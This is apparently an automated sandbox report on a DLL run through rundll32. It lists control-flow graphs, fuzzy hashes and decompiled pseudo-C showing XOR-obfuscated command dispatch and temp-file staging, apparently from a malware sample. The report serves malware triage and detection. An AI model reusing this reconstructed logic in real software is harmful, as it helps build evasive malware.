                  control_flow_graph 262 1800025ec-180002607 SleepEx 263 180002609-180002610 262->263 264 18000261b-18000261f 262->264 263->264 265 180002612-180002615 WaitForSingleObject 263->265 265->264
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ObjectSingleSleepWait
                  • String ID:
                  • API String ID: 309074506-0
                  • Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
                  • Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246593864.000001817BE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001817BE00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1817be00000_rundll32.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction ID: 28dadbc164e61d504d5fbc178535565061f7f077f2ec0cf3f70d6d22a6807003
                  • Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction Fuzzy Hash: 2F512372518644AFF7A4DB18C254BE976E5FB8C300FB4881DE286C33D1DF348A869B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 1817be01c0b 315 1817be01d2e-1817be01d3b 314->315 316 1817be01d12-1817be01d1d 315->316 317 1817be01d3d-1817be01d4a 315->317 318 1817be01d02-1817be01d10 call 1817be04929 316->318 319 1817be01d1f-1817be01d2c call 1817be04929 316->319 320 1817be01d69-1817be01d72 317->320 321 1817be01d4c-1817be01d58 317->321 318->316 318->321 319->315 319->317 323 1817be01cf3-1817be01d00 call 1817be04e98 320->323 324 1817be01d78-1817be01d83 320->324 321->319 322 1817be01d5a-1817be01d64 321->322 327 1817be01c7c-1817be01c86 322->327 323->318 338 1817be01ce8-1817be01cf1 call 1817be05141 323->338 328 1817be01d93-1817be01d9b 324->328 329 1817be01d85-1817be01d91 324->329 334 1817be01c88-1817be01db4 call 1817be01db9 327->334 335 1817be01c29-1817be01cc6 327->335 328->329 336 1817be01d9d-1817be01da6 328->336 329->328 329->336 349 1817be01cc8 335->349 350 1817be01ccd-1817be01cd5 335->350 340 1817be01cda-1817be01cdb 336->340 341 1817be01dab 336->341 338->322 345 1817be01cdf-1817be01ce3 340->345 345->341 349->350 352 1817be01c36-1817be01c43 349->352 351 1817be01c45-1817be01c51 call 1817be03499 350->351 356 1817be01c53-1817be01c60 351->356 357 1817be01c6f-1817be01c7a call 1817be05141 351->357 352->351 354 1817be01c62-1817be01c6b 352->354 354->345 356->354 358 1817be01c97-1817be01ca1 356->358 357->327 357->356 361 1817be01ca7-1817be01cad 358->361 362 1817be01c1e-1817be01c27 RtlAllocateHeap 358->362 363 1817be01cb4-1817be01cb9 361->363 364 1817be01caf call 1817be05141 361->364 362->361 363->334 367 1817be01c19 364->367 367->324
                  Memory Dump Source
                  • Source File: 00000005.00000002.246593864.000001817BE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001817BE00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1817be00000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction ID: 492e07213218143bc3489b479fd365ab6718e0e00c0d12bcafa19a9d48f09c17
                  • Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction Fuzzy Hash: 20513236518644AFE7A8D7198094FED72E9FB94301FA4851DF246CB391EF28DE829703
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
                  • String ID:
                  • API String ID: 4119021385-0
                  • Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
                  • Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 180008d78-180008dca call 180002370 409 1800090ee 406->409 410 180008dd0-180008df3 406->410 413 1800090f3-18000910c 409->413 411 180008f65 410->411 412 180008df9-180008e1a lstrlenA HeapAlloc 410->412 414 180008f6a-180008f7f HeapFree 411->414 415 1800090e4-1800090e9 412->415 416 180008e20-180008e38 memcpy 412->416 414->413 417 180008f85-180008fa5 call 180002370 414->417 415->414 418 180008e3c-180008e3f 416->418 417->409 424 180008fab-180008fc8 call 1800038f8 417->424 420 180008e41-180008e44 418->420 421 180008e46-180008e49 418->421 420->421 423 180008e4b-180008e4e 420->423 421->418 425 180008ecc 423->425 426 180008e50-180008e79 lstrlenA HeapAlloc 423->426 433 180008fd2-180008ff5 call 180002370 424->433 434 180008fca-180008fcc 424->434 428 180008ece 425->428 426->428 429 180008e7b 426->429 431 180008ed6-180008ed8 428->431 432 180008e7e-180008e85 429->432 435 180008eda-180008f03 call 18000958c 431->435 436 180008f4f-180008f5d HeapFree 431->436 437 180008e87-180008e8a 432->437 438 180008e99 432->438 452 180008ff7-18000902d call 18000958c memcpy 433->452 453 18000905e-180009081 call 180002370 433->453 434->409 434->433 450 180008f05 435->450 451 180008f09-180008f1b LeaveCriticalSection 435->451 436->411 441 180008e95-180008e97 437->441 442 180008e8c-180008e93 437->442 443 180008e9b-180008e9e 438->443 441->438 441->443 442->437 442->441 444 180008eb5-180008ec3 443->444 445 180008ea0-180008ea3 443->445 444->432 449 180008ec5-180008eca 444->449 448 180008ea6-180008ea9 445->448 454 180008eab-180008eae 448->454 455 180008eb0-180008eb3 448->455 449->431 450->451 457 180008f1d-180008f38 HeapFree * 2 451->457 458 180008f3e-180008f4d 451->458 462 180009043-180009058 LeaveCriticalSection HeapFree 452->462 463 18000902f-18000903e memset 452->463 453->413 464 180009083-180009099 call 1800038f8 453->464 454->444 454->455 455->448 457->458 458->414 462->453 463->462 464->413 467 18000909b-1800090a4 464->467 467->413 468 1800090a6-1800090e2 call 18000958c GetSystemTimeAsFileTime LeaveCriticalSection 467->468 468->413
                  C-Code - Quality: 37%
                  			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
                  				void* _t77;
                  				void* _t88;
                  				intOrPtr _t91;
                  				void* _t96;
                  				char _t97;
                  				void* _t115;
                  				long long* _t157;
                  				void* _t158;
                  				long long _t160;
                  				char* _t162;
                  				long long _t163;
                  				char* _t178;
                  				char* _t179;
                  				void* _t203;
                  				long long _t204;
                  				void* _t208;
                  				intOrPtr* _t209;
                  				int _t211;
                  				void* _t215;
                  				void* _t216;
                  				void* _t235;
                  				long _t238;
                  				long _t244;
                  				void* _t246;
                  				CHAR* _t253;
                  				long long _t254;
                  
                  				_t235 = _t215;
                  				 *((long long*)(_t235 + 8)) = __rbx;
                  				 *((long long*)(_t235 + 0x10)) = __rdx;
                  				_t216 = _t215 - 0x40;
                  				r13d =  *0x8000d498;
                  				_t209 = __rcx;
                  				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
                  				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				_t157 =  *_t209;
                  				 *((long long*)(_t216 + 0x98)) = _t157;
                  				 *((long long*)(_t216 + 0x28)) = _t204;
                  				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
                  				r8d = lstrlenA(_t253) + 1;
                  				HeapAlloc(_t246, _t244, _t238);
                  				_t254 = _t157;
                  				if (_t157 == 0) goto 0x800090e4;
                  				memcpy(_t203, _t208, _t211);
                  				_t162 = _t254;
                  				if ( *_t162 == 0x20) goto 0x80008e46;
                  				if ( *_t162 != 9) goto 0x80008e4b;
                  				_t163 = _t162 + 1;
                  				goto 0x80008e3c;
                  				if ( *_t163 == 0) goto 0x80008ecc;
                  				lstrlenA(??);
                  				asm("cdq");
                  				_t12 = _t157 + 1; // 0x1
                  				r8d = _t12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t157 == 0) goto 0x80008ece;
                  				_t96 =  *_t163;
                  				if (_t96 == 0) goto 0x80008e99;
                  				if (_t96 == 0x20) goto 0x80008e95;
                  				_t178 = _t163 + 1;
                  				_t97 =  *_t178;
                  				if (_t97 != 0) goto 0x80008e87;
                  				if (_t97 != 0) goto 0x80008e9b;
                  				if (_t178 == 0) goto 0x80008eb5;
                  				 *_t178 = 0;
                  				_t179 = _t178 + 1;
                  				if ( *_t179 == 0x20) goto 0x80008eb0;
                  				if ( *_t179 != 9) goto 0x80008eb5;
                  				goto 0x80008ea6;
                  				 *_t157 = _t163;
                  				_t158 = _t157 + _t204;
                  				if (_t179 + 1 != 0) goto 0x80008e7e;
                  				goto 0x80008ed6;
                  				if (0 == 0) goto 0x80008f4f;
                  				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
                  				 *((long long*)(_t209 + 0x40)) = _t254;
                  				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
                  				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
                  				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
                  				 *((char*)(_t209 + 0x70)) = 0;
                  				asm("lock and dword [esi+0x2c], 0xfffffffe");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80008f6a;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				if (0x57 != 0) goto 0x800090f3;
                  				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
                  				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
                  				_t91 =  *((intOrPtr*)(_t216 + 0x98));
                  				if (_t77 != 0) goto 0x80008fd2;
                  				if (_t91 == 0) goto 0x800090ee;
                  				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
                  				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
                  				_t39 = _t158 + 0x10; // 0x10
                  				_t88 = _t39;
                  				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
                  				E0000000118000958C( *_t209 + 0x18);
                  				r8d = _t115;
                  				memcpy(??, ??, ??);
                  				if (_t115 - _t88 >= 0) goto 0x80009043;
                  				r8d = _t88 - _t115;
                  				memset(??, ??, ??);
                  				LeaveCriticalSection(??);
                  				HeapFree(??, ??, ??);
                  				r13d = r13d ^ 0x1a1a0866;
                  				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
                  				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
                  				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
                  				_t55 =  *_t209 + 0x18; // 0x28
                  				E0000000118000958C(_t55);
                  				GetSystemTimeAsFileTime(??);
                  				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
                  				 *((long long*)(_t216 + 0x30)) = _t160;
                  				 *((long long*)(_t209 + 0x30)) = _t160;
                  				LeaveCriticalSection(??);
                  				goto 0x800090f3;
                  				goto 0x80008f6a;
                  				return 1;
                  			}





























                  0x180008d78
                  0x180008d7b
                  0x180008d7f
                  0x180008d8e
                  0x180008d99
                  0x180008daa
                  0x180008dbe
                  0x180008dca
                  0x180008ddc
                  0x180008de0
                  0x180008de3
                  0x180008deb
                  0x180008df3
                  0x180008e09
                  0x180008e0e
                  0x180008e14
                  0x180008e1a
                  0x180008e29
                  0x180008e35
                  0x180008e3f
                  0x180008e44
                  0x180008e46
                  0x180008e49
                  0x180008e4e
                  0x180008e53
                  0x180008e5c
                  0x180008e63
                  0x180008e63
                  0x180008e6b
                  0x180008e79
                  0x180008e7e
                  0x180008e85
                  0x180008e8a
                  0x180008e8c
                  0x180008e8f
                  0x180008e93
                  0x180008e97
                  0x180008e9e
                  0x180008ea0
                  0x180008ea3
                  0x180008ea9
                  0x180008eae
                  0x180008eb3
                  0x180008eb5
                  0x180008eba
                  0x180008ec3
                  0x180008eca
                  0x180008ed8
                  0x180008ee6
                  0x180008ef3
                  0x180008ef7
                  0x180008efb
                  0x180008f03
                  0x180008f05
                  0x180008f09
                  0x180008f12
                  0x180008f1b
                  0x180008f2a
                  0x180008f38
                  0x180008f4d
                  0x180008f57
                  0x180008f77
                  0x180008f7f
                  0x180008fa5
                  0x180008fba
                  0x180008fbf
                  0x180008fc8
                  0x180008fcc
                  0x180008fd5
                  0x180008ff5
                  0x180008ffa
                  0x180008ffa
                  0x18000900b
                  0x180009013
                  0x180009021
                  0x180009026
                  0x18000902d
                  0x18000903b
                  0x18000903e
                  0x180009048
                  0x180009058
                  0x18000905e
                  0x180009081
                  0x180009099
                  0x1800090a4
                  0x1800090a9
                  0x1800090ad
                  0x1800090b7
                  0x1800090cc
                  0x1800090d3
                  0x1800090d8
                  0x1800090dc
                  0x1800090e2
                  0x1800090e9
                  0x18000910c

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
                  • String ID:
                  • API String ID: 3273538229-0
                  • Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
                  • Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 520 180001844-180001874 521 18000187a-18000187d 520->521 522 180001a6f-180001a85 520->522 521->522 523 180001883-180001893 call 180007b04 521->523 526 180001899-1800018b3 GetTempPathW 523->526 527 180001a6a 523->527 528 180001a55 526->528 529 1800018b9-1800018cf HeapAlloc 526->529 527->522 530 180001a5a-180001a68 HeapFree 528->530 529->528 531 1800018d5-1800018e3 GetTempPathW 529->531 530->522 532 1800018e5-180001914 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 531->532 533 180001916-180001924 HeapFree 531->533 532->533 534 180001927-18000192a 532->534 533->534 534->528 535 180001930-180001935 534->535 536 180001938-18000194f StrChrW 535->536 537 180001951-180001962 536->537 538 180001964-180001972 lstrlenW 536->538 539 180001976-180001979 537->539 538->539 540 1800019a7-1800019ab 539->540 541 18000197b-180001986 539->541 544 1800019b9-1800019c4 540->544 545 1800019ad-1800019b7 540->545 542 180001988-18000198c 541->542 543 18000198e-180001997 541->543 542->543 546 180001999-18000199c 542->546 543->541 543->546 547 1800019c6-1800019e0 call 180009b7c 544->547 548 1800019ef-1800019f2 544->548 545->546 546->540 549 18000199e-1800019a5 546->549 552 180001a3c-180001a53 DeleteFileW HeapFree 547->552 555 1800019e2-1800019e8 547->555 551 1800019f4-180001a0d call 180003698 548->551 548->552 549->540 549->545 551->552 557 180001a0f-180001a36 call 180005bdc HeapFree 551->557 552->530 555->551 558 1800019ea 555->558 557->552 558->536
                  C-Code - Quality: 15%
                  			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
                  				signed long long _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t27;
                  				int _t34;
                  				void* _t36;
                  				int _t53;
                  				int _t61;
                  				intOrPtr _t68;
                  				intOrPtr _t69;
                  				intOrPtr* _t92;
                  				signed long long _t93;
                  				intOrPtr* _t106;
                  				void* _t118;
                  				void* _t121;
                  				intOrPtr* _t122;
                  				intOrPtr* _t123;
                  				void* _t125;
                  				signed long long _t132;
                  				void* _t140;
                  				void* _t145;
                  
                  				_t94 = __rbx;
                  				_a8 = __rbx;
                  				_t92 =  *0x8000d4a0;
                  				r12d = 0;
                  				_t145 = __rcx;
                  				if (__rdx == _t140) goto 0x80001a6f;
                  				if ( *__rdx == r12b) goto 0x80001a6f;
                  				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
                  				if (_t92 == _t140) goto 0x80001a6a;
                  				_t93 =  *0x8000d4a0;
                  				_t27 = GetTempPathW(??, ??);
                  				if (_t27 == r12d) goto 0x80001a55;
                  				HeapAlloc(??, ??, ??);
                  				if (_t93 == _t140) goto 0x80001a55;
                  				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
                  				GetSystemTimeAsFileTime(??);
                  				r8d = GetCurrentThreadId() ^ _a32;
                  				if (GetTempFileNameW(??, ??, ??, ??) != r12d) goto 0x80001927;
                  				_t132 = _t93;
                  				HeapFree(??, ??, ??);
                  				if (_t140 == _t140) goto 0x80001a55;
                  				_t122 = _t92;
                  				__imp__StrChrW();
                  				r8d = 0;
                  				if (_t93 == _t132) goto 0x80001964;
                  				_a16 = _t27;
                  				goto 0x80001976;
                  				_t106 = _t122;
                  				_t34 = lstrlenW(??);
                  				r8d = 0;
                  				_a16 = _t34;
                  				if (_t34 == r8d) goto 0x800019a7;
                  				_t11 = _t106 - 1; // -1
                  				_t61 = _t11;
                  				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
                  				if (_t68 == 0x20) goto 0x8000198e;
                  				if (_t68 != 9) goto 0x80001999;
                  				_t53 = _t61;
                  				_a16 = _t61;
                  				if (_t61 != r8d) goto 0x8000197b;
                  				if (_t53 == r8d) goto 0x800019a7;
                  				_t69 =  *_t122;
                  				if (_t69 == 0x20) goto 0x800019ad;
                  				if (_t69 != 9) goto 0x800019b9;
                  				_t123 = _t122 + 2;
                  				_a16 = _t53 - 1;
                  				goto 0x80001999;
                  				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
                  				if ( *_t123 == r8w) goto 0x800019ef;
                  				_v72 = _t132;
                  				r9d = 0;
                  				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
                  				if (_t36 != 0) goto 0x80001a3c;
                  				if (_t93 + 2 == 0) goto 0x800019f4;
                  				goto 0x80001938;
                  				if (_t36 != r8d) goto 0x80001a3c;
                  				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
                  				r9d = _a16;
                  				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
                  				HeapFree(??, ??, ??);
                  				DeleteFileW(??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a5a;
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a6f;
                  				return 8;
                  			}

























                  0x180001844
                  0x180001844
                  0x180001858
                  0x18000185f
                  0x180001869
                  0x180001874
                  0x18000187d
                  0x180001888
                  0x180001893
                  0x180001899
                  0x1800018a8
                  0x1800018b3
                  0x1800018c3
                  0x1800018cf
                  0x1800018e3
                  0x1800018ed
                  0x180001908
                  0x180001914
                  0x180001916
                  0x18000191e
                  0x18000192a
                  0x180001935
                  0x180001940
                  0x180001946
                  0x18000194f
                  0x18000195e
                  0x180001962
                  0x180001964
                  0x180001967
                  0x18000196d
                  0x180001972
                  0x180001979
                  0x18000197b
                  0x18000197b
                  0x18000197e
                  0x180001986
                  0x18000198c
                  0x18000198e
                  0x180001990
                  0x180001997
                  0x18000199c
                  0x18000199e
                  0x1800019a5
                  0x1800019ab
                  0x1800019ad
                  0x1800019b3
                  0x1800019b7
                  0x1800019bb
                  0x1800019c4
                  0x1800019c6
                  0x1800019cb
                  0x1800019d7
                  0x1800019e0
                  0x1800019e8
                  0x1800019ea
                  0x1800019f2
                  0x180001a0d
                  0x180001a0f
                  0x180001a22
                  0x180001a36
                  0x180001a3f
                  0x180001a4d
                  0x180001a53
                  0x180001a62
                  0x180001a68
                  0x180001a85

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
                  • String ID:
                  • API String ID: 2968359827-0
                  • Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
                  • Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
                  				void* __rdi;
                  				void* __rsi;
                  				signed int _t35;
                  				void* _t69;
                  				void* _t80;
                  				char* _t113;
                  				signed long long _t116;
                  				char* _t124;
                  				void* _t142;
                  				void* _t145;
                  				char* _t147;
                  				signed long long _t150;
                  				void* _t152;
                  				void* _t153;
                  				long _t169;
                  				void* _t170;
                  				void* _t172;
                  				void* _t175;
                  
                  				_t116 = __rbx;
                  				 *((long long*)(_t152 + 8)) = __rbx;
                  				 *(_t152 + 0x18) = _t150;
                  				_t153 = _t152 - 0x40;
                  				_t113 =  *0x8000d4a0;
                  				r15d =  *0x8000d498;
                  				_t35 = r15d ^ __edx;
                  				_t146 = __r8;
                  				_t170 = __rcx;
                  				_t4 = _t150 + 1; // 0x1
                  				_t80 = _t4;
                  				if (_t35 == 0x139d2b8d) goto 0x8000588d;
                  				if (_t35 == 0x15f5a8c2) goto 0x80005865;
                  				if (_t35 == 0x2f77acf9) goto 0x8000588b;
                  				if (_t35 == 0x31f2972e) goto 0x80005861;
                  				if (_t35 == 0x48e12436) goto 0x80005965;
                  				if (_t35 == 0x4d382929) goto 0x80005905;
                  				if (_t35 == 0x7f513d6b) goto 0x80005863;
                  				if (_t35 == 0xb016dc39) goto 0x80005852;
                  				if (_t35 == 0xb057dfc9) goto 0x800057e4;
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
                  				if (_t113 == 0) goto 0x8000583e;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
                  				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
                  				goto 0x800059bb;
                  				HeapFree(_t172, _t169, _t142);
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				SetEvent(_t145);
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				_t124 = _t113;
                  				E000000011800024CC(r9d, _t116, _t124, _t146);
                  				_t147 = _t113;
                  				if (_t113 == 0) goto 0x8000583e;
                  				if (_t80 + _t80 != 2) goto 0x800058ae;
                  				goto 0x800058c2;
                  				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
                  				WaitForSingleObject(??, ??);
                  				asm("sbb ebx, ebx");
                  				goto 0x800058f1;
                  				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
                  				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
                  				goto 0x8000582e;
                  				if (_t80 == 0) goto 0x800059bb;
                  				if (0x426 != 0x426) goto 0x800059bb;
                  				if (_t147 == 0) goto 0x8000595f;
                  				if ( *_t147 == 0) goto 0x8000595f;
                  				memset(??, ??, ??);
                  				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
                  				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
                  				asm("ror ax, 0x8");
                  				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
                  				if (0 != 0) goto 0x800059bb;
                  				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
                  				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
                  				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
                  				HeapFree(??, ??, ??);
                  				goto 0x8000599f;
                  				if (_t80 == 0) goto 0x800059bb;
                  				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
                  				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
                  				if (_t69 == 0x3e5) goto 0x800059e1;
                  				r8d = _t69;
                  				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
                  				return _t69;
                  			}





















                  0x180005748
                  0x180005748
                  0x18000574d
                  0x18000575a
                  0x18000575e
                  0x180005765
                  0x180005777
                  0x180005779
                  0x18000577c
                  0x18000577f
                  0x18000577f
                  0x180005787
                  0x180005792
                  0x18000579d
                  0x1800057a8
                  0x1800057b3
                  0x1800057be
                  0x1800057c9
                  0x1800057d4
                  0x1800057db
                  0x1800057df
                  0x1800057e7
                  0x1800057ef
                  0x1800057fa
                  0x180005804
                  0x18000581f
                  0x180005826
                  0x180005833
                  0x180005839
                  0x180005843
                  0x18000584d
                  0x180005856
                  0x18000585c
                  0x180005868
                  0x18000586d
                  0x180005870
                  0x180005875
                  0x18000587b
                  0x180005880
                  0x180005889
                  0x180005894
                  0x18000589c
                  0x1800058a4
                  0x1800058ac
                  0x1800058be
                  0x1800058ca
                  0x1800058de
                  0x1800058e7
